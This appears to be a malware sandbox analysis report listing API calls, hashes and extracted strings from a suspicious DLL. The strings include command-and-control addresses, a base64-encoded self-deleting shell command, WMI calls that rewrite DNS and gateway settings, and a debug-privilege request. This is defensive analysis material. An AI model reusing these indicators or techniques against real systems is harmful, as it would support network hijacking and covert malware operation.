• String ID:
• API String ID: 2623510744-0
• Opcode ID: 77353f5716135edde9ad633b9f31e3de775be7a2ad78027e3471a0842fb40d1b
• Instruction ID: 5bf3ea98f070a2570916fa8bd6be237ec7ca37b5474a227deadc1955bba6efa9
• Opcode Fuzzy Hash: 77353f5716135edde9ad633b9f31e3de775be7a2ad78027e3471a0842fb40d1b
• Instruction Fuzzy Hash: 29A00176509612ABDA42AB51CE4884ABEA2BBA8381F01C819F5C940034CB3284A5EB12
APIs
• Process32Next.KERNEL32(00000000,00000000), ref: 1000411D
Memory Dump Source
• Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
Similarity
• API ID: NextProcess32
• String ID:
• API String ID: 1850201408-0
• Opcode ID: 76ac9178f20d1e5b2dd5acb7bf8efce219d4f311f27991283bdd85d0e408ffac
• Instruction ID: ad0ec3404e59fce47abb20f3156c1013a00ec4a2375eb1d4fc778c90646c9428
• Opcode Fuzzy Hash: 76ac9178f20d1e5b2dd5acb7bf8efce219d4f311f27991283bdd85d0e408ffac
• Instruction Fuzzy Hash: C5A00136408616ABDA42AB50CE4884ABEB2BBA8381F11C819F58941034C73684A5EB12
APIs
• gethostbyname.WS2_32(00000000), ref: 10003EB8
Memory Dump Source
• Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
Similarity
• API ID: gethostbyname
• String ID:
• API String ID: 930432418-0
• Opcode ID: fc91f4d470c00956c20761c75c87ac3b5c2c2a029df382280b375b46dca54598
• Instruction ID: 7611b61dc22816f8d5f353788f7ebe3095af129dd0cc495379a0ce63c0a0d031
• Opcode Fuzzy Hash: fc91f4d470c00956c20761c75c87ac3b5c2c2a029df382280b375b46dca54598
• Instruction Fuzzy Hash: 0B900274546110ABDE015B11CF494097A61BB84711F048454E04A40131C7318810EA01
APIs
• PathFileExistsA.SHLWAPI(00000000,10005CA4,?,?,%s\lang.ini,C:\Users\user\Desktop,?,00080000,00000000), ref: 10003F76
Memory Dump Source
• Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
Similarity
• API ID: ExistsFilePath
• String ID:
• API String ID: 1174141254-0
• Opcode ID: 45c733f9b34b8ea95908bfc7e9da03f807b7cee25ea2d2ba077378ef7c34ab25
• Instruction ID: c8e16be2efcce4d448928bc2c60560182cfc46435cfcb87bea268b953d58fe61
• Opcode Fuzzy Hash: 45c733f9b34b8ea95908bfc7e9da03f807b7cee25ea2d2ba077378ef7c34ab25
• Instruction Fuzzy Hash: CB9002705051109FDE015B51CF494097A61AF84701B008458E09985031C7318910FA01
APIs
• GetDriveTypeA.KERNEL32(?,1000826F,10015958), ref: 1000400E
Memory Dump Source
• Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
Similarity
• API ID: DriveType
• String ID:
• API String ID: 338552980-0
• Opcode ID: 7c79f17bced885cdb9c1f6f7975923c4ee5d1aa6cab9913023579efd0895b657
• Instruction ID: a1a8ac53c5cfb0e486bd6d98d172d36f24ef9d27b55460fc84cfdef9c945b13a
• Opcode Fuzzy Hash: 7c79f17bced885cdb9c1f6f7975923c4ee5d1aa6cab9913023579efd0895b657
• Instruction Fuzzy Hash: 3E9002304041109BDE015B10CE494097AA2AB85701B00C454E05540130C7368911EA01
APIs
• RegCloseKey.KERNEL32(?,10005E30,?,?,ProcessorNameString,00000000,00000004,-00000298,-00000020,80000002,-00000094,00000000,000F003F,-0000001C,00000000,00000000), ref: 10004096
Memory Dump Source
• Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
Similarity
• API ID: Close
• String ID:
• API String ID: 3535843008-0
• Opcode ID: a92c0e71bed44d8b38908b017688781e2389fbe67ed51b21ca4416f74f44b28f
• Instruction ID: aee7d52c32ff15d31c72f216b84899083fd4a99e4b5d443cf07de2a1f5c34de8
• Opcode Fuzzy Hash: a92c0e71bed44d8b38908b017688781e2389fbe67ed51b21ca4416f74f44b28f
• Instruction Fuzzy Hash: 9E9002705055119FDE015B51CF494097A65AF84701B008454E04945430C771C810EA01
Strings
Memory Dump Source
• Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
Similarity
• API ID:
• String ID: K
• API String ID: 0-856455061
• Opcode ID: 40533ac75a34c0e28785cd811d3dcb55fe45dda3d4d2e35189a70ffc9c8f5c8e
• Instruction ID: 49037399acb4103f62bffe2178a7c6eb5bfae0e2df4e7c6f60cc06e2240279ee
• Opcode Fuzzy Hash: 40533ac75a34c0e28785cd811d3dcb55fe45dda3d4d2e35189a70ffc9c8f5c8e
• Instruction Fuzzy Hash: 7B9123311046896EDB21CFAC8C81EFFBBBCAF06A40F840549FE85C7242D255E92D9771
APIs
• ExitWindowsEx.USER32(?,?), ref: 10003F6B
Memory Dump Source
• Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
Similarity
• API ID: ExitWindows
• API String ID: 1089080001-0
Memory Dump Source
• Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
Memory Dump Source
• Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
Memory Dump Source
• Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
APIs
• SafeArrayCreate.OLEAUT32(00000008,00000001,?), ref: 1000735B
• VariantInit.OLEAUT32(?), ref: 10007370
• SafeArrayCreate.OLEAUT32(00000003,00000001,?), ref: 1000738B
• VariantInit.OLEAUT32(?), ref: 1000739A
  • Part of subcall function 10007A85: VariantInit.OLEAUT32(?), ref: 10007AC4
• SafeArrayCreate.OLEAUT32(00000008,00000001,00000002), ref: 10007528
• VariantInit.OLEAUT32(?), ref: 10007536
Memory Dump Source
• Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
Similarity
• API ID: InitVariant$ArrayCreateSafe
• String ID: DNSServerSearchOrder$DefaultIPGateway$GatewayCostMetric$IPEnabled=TRUE$Index$SetDNSServerSearchOrder$SetGateways$Win32_NetworkAdapterConfiguration$Win32_NetworkAdapterConfiguration.Index=$p=Vu
• API String ID: 2640012081-1190809373
                                                                                                                                                                          • Opcode ID: 79137d61cba49b853a1e0c6cf19b6010acc63f4405b1c2f6576b3498c337d283
                                                                                                                                                                          • Instruction ID: 9ca97b7ebb433752ffed003b4f688b974b795f87ac827d3fa99277f148b18eb5
                                                                                                                                                                          • Opcode Fuzzy Hash: 79137d61cba49b853a1e0c6cf19b6010acc63f4405b1c2f6576b3498c337d283
                                                                                                                                                                          • Instruction Fuzzy Hash: EDD16074D00219EFEB15CFA4C8809EEBBB5FF04781F204419F419AB259DB75AA45CFA1
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          • Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXGV0Y1wlYyVjJWMuJWMlYyVj, xrefs: 10005581
                                                                                                                                                                          • Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXCVzXCVz, xrefs: 100054BB
                                                                                                                                                                          • %s\%s, xrefs: 10005443
                                                                                                                                                                          • c:\windows\system32\drivers\%s, xrefs: 100054AA
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: rand$wsprintf$FilePrintSleep
                                                                                                                                                                          • String ID: %s\%s$Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXCVzXCVz$Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXGV0Y1wlYyVjJWMuJWMlYyVj$c:\windows\system32\drivers\%s
                                                                                                                                                                          • API String ID: 2577056782-455112146
                                                                                                                                                                          • Opcode ID: 67512bb8040b031426eaab9b4334ec40ff00c545cd59c41cf9516fa560dd9287
                                                                                                                                                                          • Instruction ID: 707e71cc3576b89c72abdeb88e14083c0e5233f75fe593892cbd880b6aeee3b6
                                                                                                                                                                          • Opcode Fuzzy Hash: 67512bb8040b031426eaab9b4334ec40ff00c545cd59c41cf9516fa560dd9287
                                                                                                                                                                          • Instruction Fuzzy Hash: 7C61F973A00258BFEB14DB64CC46FEB77AEEB84351F144466FA049B1D0DB76EA848A50
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
Similarity
• API ID: wsprintf
• String ID: %s\%s$%s\version.txt$107.163.56.251:6658$12091507$12091507$C:\Users\user\Desktop$C:\Users\user\Desktop\12091507$C:\Users\user\Desktop\2JSGOlbNym.dll$C:\Users\user\Desktop\version.txt$C:\Windows\SysWOW64\rundll32.exe$ECF4BB45F69F$M%s$M107.163.56.251:6658
• API String ID: 2111968516-22818032
• Opcode ID: 7cbfd82683c9c081f3a982ca76c3b6eece48747b5586e8c6d2748a7453c162e6
• Instruction ID: 2c0e65cf9d0f003dd0541039253934f55528cad486157ddc35f7c3791a233049
• Opcode Fuzzy Hash: 7cbfd82683c9c081f3a982ca76c3b6eece48747b5586e8c6d2748a7453c162e6
• Instruction Fuzzy Hash: 1C1127756007587BF210E7619C85F5F7E5CDF896EAF01012AF6049E181DB76EC808672
APIs
• VariantInit.OLEAUT32(?), ref: 10004ED7
• VariantInit.OLEAUT32(?), ref: 10004EDD
• VariantInit.OLEAUT32(?), ref: 10004EE3
• VariantInit.OLEAUT32(?,?,?,00000000,?,?,?,?,?,?,?,10016AF0,00000000,00080000), ref: 10005021
Strings
Memory Dump Source
• Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
Similarity
• API ID: InitVariant
• String ID: CommandLine$Name$ProcessID$SELECT * FROM $WQL$p=Vu$svchost.exe$svchost.exe -k NetworkService
• API String ID: 1927566239-3240772352
• Opcode ID: 98dcacb95cbd717f680043640c997e590893addb6ec040face789dea5994894a
• Instruction ID: 9d9a7b9c9ad05fb17601a1e21a41dbb997ac73afb50a28aca2ce94161bb16792
• Opcode Fuzzy Hash: 98dcacb95cbd717f680043640c997e590893addb6ec040face789dea5994894a
• Instruction Fuzzy Hash: 2AA14AB5900209AFEB04DFA4CC81DEEBBB8FF48394F104569F515AB294CB31AE45CB60
APIs
  • Part of subcall function 10003F72: PathFileExistsA.SHLWAPI(00000000,10005CA4,?,?,%s\lang.ini,C:\Users\user\Desktop,?,00080000,00000000), ref: 10003F76
• Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 10005D73
Strings
Memory Dump Source
• Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
Similarity
• API ID: Timer$Concurrency::details::platform::__CreateExistsFilePathQueue
• String ID: %s\lang.ini$C:\Users\user\Desktop$http://$search
• API String ID: 1721638100-4171480768
• Opcode ID: 8e46dae448c166898a377d8e58f34a63fab9a8fdb354c69680971baf7c4745fe
• Instruction ID: 870dc5a9e8937f5dec60cb765e1a8b9b6c263c42da1418f367658ae9c7f1e2c5
• Opcode Fuzzy Hash: 8e46dae448c166898a377d8e58f34a63fab9a8fdb354c69680971baf7c4745fe
• Instruction Fuzzy Hash: 491106769081197BFB61DAA4CC42FDB776CDB043D5F0045B2FB44A5091EA72EFC48660
APIs
• wsprintfA.USER32 ref: 10008847
• Sleep.KERNEL32(000007D0,?,?,00000000), ref: 10008868
Strings
• SeDebugPrivilege, xrefs: 10034413
• C:\Users\user\Desktop, xrefs: 1000882E
• Y21kLmV4ZSAvYyBwaW5nIDEyNy4wLjAuMSAtbiAzJnJkIC9zIC9xICIlcyI=, xrefs: 10008833
Memory Dump Source
• Source File: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Sleepwsprintf
                                                                                                                                                                          • String ID: C:\Users\user\Desktop$SeDebugPrivilege$Y21kLmV4ZSAvYyBwaW5nIDEyNy4wLjAuMSAtbiAzJnJkIC9zIC9xICIlcyI=
                                                                                                                                                                          • API String ID: 1749205058-3528884915
                                                                                                                                                                          • Opcode ID: fb7bd00363eee39283619e1ed9a14e5cb504e9f8b94119214717727e2e393674
                                                                                                                                                                          • Instruction ID: eef6782f7c8bf8d562aff317d79cc2e303554eab770f54d6d404826304d9c596
                                                                                                                                                                          • Opcode Fuzzy Hash: fb7bd00363eee39283619e1ed9a14e5cb504e9f8b94119214717727e2e393674
                                                                                                                                                                          • Instruction Fuzzy Hash: C611E3B4004245BFE702DF10DC81AAE7BA8FF44384F40886DF6856A241CBB1AAD48B56
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 10003F72: PathFileExistsA.SHLWAPI(00000000,10005CA4,?,?,%s\lang.ini,C:\Users\user\Desktop,?,00080000,00000000), ref: 10003F76
                                                                                                                                                                          • Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 10005CC8
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Timer$Concurrency::details::platform::__CreateExistsFilePathQueue
                                                                                                                                                                          • String ID: %s\lang.ini$C:\Users\user\Desktop$http://
                                                                                                                                                                          • API String ID: 1721638100-2270416971
                                                                                                                                                                          • Opcode ID: 8aec026792d7cc627ceaacea1753a4a0de1203c886fd673e3097a2cb49c9cb00
                                                                                                                                                                          • Instruction ID: 57a004b8a41de6ea14946d18f863adaefc4c4a039aa1cd5e98ec9af79828a04e
                                                                                                                                                                          • Opcode Fuzzy Hash: 8aec026792d7cc627ceaacea1753a4a0de1203c886fd673e3097a2cb49c9cb00
                                                                                                                                                                          • Instruction Fuzzy Hash: FF11047690411C7EFB21DAA4CC42FDB7B6CDB04398F0045B1FB44B6081EA71AF844660
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Sleep
                                                                                                                                                                          • String ID: 107.163.56.232:18963/main.php$L2ltYWdlLnBocA==$P
                                                                                                                                                                          • API String ID: 3472027048-2873435839
                                                                                                                                                                          • Opcode ID: 28d9bd6881a47177b600a1b2b79ae0656f869879b20bf0f0592bdd982a13f97b
                                                                                                                                                                          • Instruction ID: 06cf6e753789beb41ee34e7b66c8b6e5b7de97640241e5e5236da3cdb21958a2
                                                                                                                                                                          • Opcode Fuzzy Hash: 28d9bd6881a47177b600a1b2b79ae0656f869879b20bf0f0592bdd982a13f97b
                                                                                                                                                                          • Instruction Fuzzy Hash: 2831867790425D6EEB11D7B4DC41BDA7B7CFF18350F5404E6E248E6182EB719B988B10
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: wsprintf
                                                                                                                                                                          • String ID: %s\%s$.$\*.*
                                                                                                                                                                          • API String ID: 2111968516-2210278135
                                                                                                                                                                          • Opcode ID: a6effb536eca214d7256199a0a198b34f123812134fbf0658ca86594e8f67df4
                                                                                                                                                                          • Instruction ID: 788f7299f4ef3f0d15df8f53932c811205ff60b6d2b73f04fca062f583e9a503
                                                                                                                                                                          • Opcode Fuzzy Hash: a6effb536eca214d7256199a0a198b34f123812134fbf0658ca86594e8f67df4
                                                                                                                                                                          • Instruction Fuzzy Hash: 59316FB6C0025CBEEF12DBA4CD46ECEBB79EF04380F1005E6F618A6051DB719B989B50
                                                                                                                                                                          APIs
                                                                                                                                                                          • wsprintfA.USER32 ref: 10008847
                                                                                                                                                                          • Sleep.KERNEL32(000007D0,?,?,00000000), ref: 10008868
                                                                                                                                                                          Strings
                                                                                                                                                                          • C:\Users\user\Desktop, xrefs: 1000882E
                                                                                                                                                                          • Y21kLmV4ZSAvYyBwaW5nIDEyNy4wLjAuMSAtbiAzJnJkIC9zIC9xICIlcyI=, xrefs: 10008833
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
